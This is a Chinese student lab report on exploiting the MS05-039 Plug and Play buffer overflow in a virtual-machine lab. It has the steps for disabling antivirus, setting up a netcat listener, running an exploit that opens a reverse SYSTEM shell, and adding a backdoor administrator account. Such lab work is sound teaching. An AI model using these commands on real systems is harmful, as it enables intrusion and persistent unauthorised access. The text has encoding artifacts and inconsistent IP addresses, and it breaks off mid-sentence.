計(jì)算機(jī)網(wǎng)絡(luò)安全實(shí)驗(yàn)報(bào)告

1、計(jì)算機(jī)網(wǎng)絡(luò)安全實(shí)驗(yàn)報(bào)告實(shí)驗(yàn)序號(hào)：6實(shí)驗(yàn)項(xiàng)目名稱：緩沖區(qū)溢出攻擊與防范實(shí)驗(yàn)學(xué)號(hào)姓名專業(yè)、班實(shí)驗(yàn)地點(diǎn)實(shí)1-411指導(dǎo)教師實(shí)驗(yàn)時(shí)間2011-11-15一、實(shí)驗(yàn)?zāi)康募耙笸ㄟ^實(shí)驗(yàn)掌握緩沖區(qū)溢出的原理；通過使用緩沖區(qū)溢出攻擊軟件模擬入侵遠(yuǎn)程主機(jī)；理解緩沖區(qū)溢出危險(xiǎn)性；理解防范和避免緩沖區(qū)溢出攻擊的措施。二、實(shí)驗(yàn)設(shè)備（環(huán)境）及要求Windows 2000 server，虛擬機(jī).本實(shí)驗(yàn)需要用到虛擬機(jī)，因此每臺(tái)實(shí)驗(yàn)主機(jī)都通過安裝軟件WMware Workstation分割出了虛擬機(jī)。真實(shí)主機(jī)P1的配置為：操作系統(tǒng)Windows 2000 server SP0或者windows XP sp2，并且安裝ms05-

2、039.exe緩沖區(qū)溢出攻擊軟件。虛擬機(jī)P2配置為：操作系統(tǒng)Windows2000 Server SP0（沒有另外打補(bǔ)丁，存在ms05039漏洞）。3)實(shí)驗(yàn)網(wǎng)絡(luò)拓?fù)鋱D三、實(shí)驗(yàn)內(nèi)容與步驟緩沖區(qū)溢出攻擊之所以成為一種常見的攻擊手段，其原因在于緩沖區(qū)溢出漏洞太普通了，并且易于實(shí)現(xiàn)。而且，緩沖區(qū)溢出所以成為遠(yuǎn)程攻擊的主要手段，其原因在于緩沖區(qū)溢出漏洞給予了攻擊者所想要的一切：植入并且執(zhí)行攻擊代碼。被植入的攻擊代碼以一定的權(quán)限運(yùn)行有緩沖區(qū)溢出漏洞的程序，從而得到被攻擊主機(jī)的控制權(quán)。 實(shí)驗(yàn)任務(wù)： 利用ms05-039溢出漏洞攻擊MS05-039漏洞是Microsoft Windows即插即用功能遠(yuǎn)程緩沖區(qū)

3、溢出漏洞。Microsoft Windows即插即用（PnP）功能允許操作系統(tǒng)在安裝新硬件時(shí)能夠檢測到這些設(shè)備。Microsoft Windows即插即用功能中存在緩沖區(qū)溢出漏洞，造成該漏洞的原因是Plug and Play 服務(wù)中有未經(jīng)檢查的緩沖區(qū)。成功利用這個(gè)漏洞的攻擊者可以完全控制受影響的系統(tǒng)。這是一個(gè)嚴(yán)重的安全漏洞，成功的攻擊者可以完全控制被攻擊的計(jì)算機(jī)。這個(gè)漏洞既可以用來遠(yuǎn)程溢出（只適用于目標(biāo)系統(tǒng)是2000和xp sp1），也可以用來本地提升權(quán)限（2000以上版本都可以）。而且溢出成功后會(huì)得到一個(gè)SYSTEM權(quán)限的shell。本實(shí)驗(yàn)是在主機(jī)上利用ms05039溢出工具對(duì)虛擬機(jī)上的ms

4、05039漏洞進(jìn)行溢出攻擊，入侵成功后獲得系統(tǒng)的控制權(quán)。 1）入侵準(zhǔn)備工作這是一個(gè)遠(yuǎn)程執(zhí)行代碼和本地特權(quán)提升漏洞。在 Windows 2000 上，匿名攻擊者可能試圖遠(yuǎn)程利用此漏洞。在 Windows XP Service Pack 1 上，只有經(jīng)身份驗(yàn)證的用戶可試圖遠(yuǎn)程利用此漏洞。 在 Window XP Service Pack 2 和 Windows Server 2003 上，只有管理員才能遠(yuǎn)程訪問受影響的組件。成功利用此漏洞的攻擊者可完全控制受影響的系統(tǒng)。攻擊者可隨后安裝程序，查看、更改或刪除數(shù)據(jù)，或者創(chuàng)建擁有完全用戶權(quán)限的新帳戶。（1）關(guān)閉本機(jī)（攻擊主機(jī)）上的殺毒軟件和防火墻軟件，

5、確保實(shí)驗(yàn)軟件能夠運(yùn)行；（2）運(yùn)行nc.exe。在本地進(jìn)行監(jiān)聽：nc vv l p 99，如圖2。圖2 運(yùn)行nc 進(jìn)行監(jiān)聽2）對(duì)遠(yuǎn)程主機(jī)進(jìn)ms05-039漏洞進(jìn)行入侵實(shí)驗(yàn)在命令行下進(jìn)行，具體操作如下：（1）運(yùn)行ms05039scan.exe,如圖3，設(shè)定探測目標(biāo)172.16.167.103（實(shí)驗(yàn)中以實(shí)際虛擬機(jī)為準(zhǔn)）。圖3 ms05039掃描（2）點(diǎn)擊“”按鈕；（3）運(yùn)行結(jié)束后查看結(jié)果，此例中表明目標(biāo)主機(jī)有該漏洞，可以進(jìn)行下一步攻擊。3）攻擊（1）在dos下運(yùn)行ms05039攻擊程序ms0539.exe。ms0539.exe是一個(gè)利用遠(yuǎn)程主機(jī)ms05-039漏洞進(jìn)行溢出的工具，它在命令行下使用，使

6、用格式如下： ms05039.exe <host> <conIP> <conPort> target其中：host :目標(biāo)主機(jī)地址conIP ：回連ip地址，一般就是本地主機(jī)ip地址onPort：回連端口，如該實(shí)驗(yàn)中的“99”target ：目標(biāo)系統(tǒng)類型，缺省為1系統(tǒng)類型有兩種：0：English win2k(sp4)1 ：Chinese win2k (sp4)我們在命令行下輸入：ms05039.exe 172.16.167.101 172.16.167.151，（這表示對(duì)172.16.167.103進(jìn)行遠(yuǎn)程溢出，溢出后返回的ip是172.16.167.10

7、3，返回端口是99，遠(yuǎn)程主機(jī)的操作系統(tǒng)類型是Chinese win2k sp4），如圖4所示 圖4 執(zhí)行ms05039攻擊（2）檢查我們剛才運(yùn)行nc的dos窗口，若出現(xiàn)圖5所示，則表明攻擊成功。此dos窗口中運(yùn)行的任何命令都是在目標(biāo)主機(jī)上運(yùn)行，相當(dāng)于在目標(biāo)主機(jī)本機(jī)上開一個(gè)dos窗口運(yùn)行程序一樣。 圖5 攻擊成功的結(jié)果（3）驗(yàn)證。運(yùn)行net user hacker /add和net localgroup administrators hacker /add驗(yàn)證攻擊者運(yùn)行程序的權(quán)限，若成功則表明有超級(jí)用戶權(quán)限。成功后可以在目標(biāo)主機(jī)上驗(yàn)證是否添加了用戶。四、實(shí)驗(yàn)結(jié)果與數(shù)據(jù)處理如以上分析結(jié)果所示。五、分析與討論通過本次實(shí)驗(yàn)基本的掌握緩沖區(qū)溢出的原理，知道它是怎樣進(jìn)行攻擊的。也能夠通過使用緩沖區(qū)